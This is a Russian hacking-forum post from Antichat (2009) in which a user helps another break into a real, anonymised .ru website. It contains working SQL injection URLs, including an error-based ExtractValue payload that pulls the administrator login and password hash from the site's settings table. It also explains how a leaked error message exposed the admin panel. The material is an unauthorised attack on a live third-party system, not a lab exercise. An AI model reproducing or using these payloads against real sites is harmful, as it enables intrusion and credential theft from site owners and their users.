29.12.2009, 13:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от mental2
Вот немогу понять почему вот так выводиться
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+1='1/
а вот так не.
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+(SELECT+id+from+catalogue_fin+where+i d=1+LIMIT+1)='1/
Да и вообще как можно раскрутить в данной ситуации, а то уже все перепробывал..
скрипт странно реагирует на точку '.', в связи с чем с ходу не удалось составить запрос в другую базу, зато по ошибке:
in /usr/home/hosting/public_html/webadmin/inc/pvp.php on line 55
находим админку <скрыто>/webadmin/login.php, которая также страдает фрагментированной sqli, но и её не получилось раскрутить в связи с тем что пароль передается в виде md5, зато по выводимомой ошибке можно составить запрос в 1 sqli:
SELECT id, AdminLogin, AdminOpnWin,lock_user,lock_time FROM settings WHERE AdminLogin like binary '\' and AdminPassword='d41d8cd98f00b204e9800998ecf8427e'"
http://www.скрыто_по_просьбе_автора. ru/clients'*ExtractValue(1,concat(1,(select(concat(Ad minLogin,AdminPassword))from(settings)where(id=1)) ))*'1/
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 02.01.2010 в 23:13..
|
|
|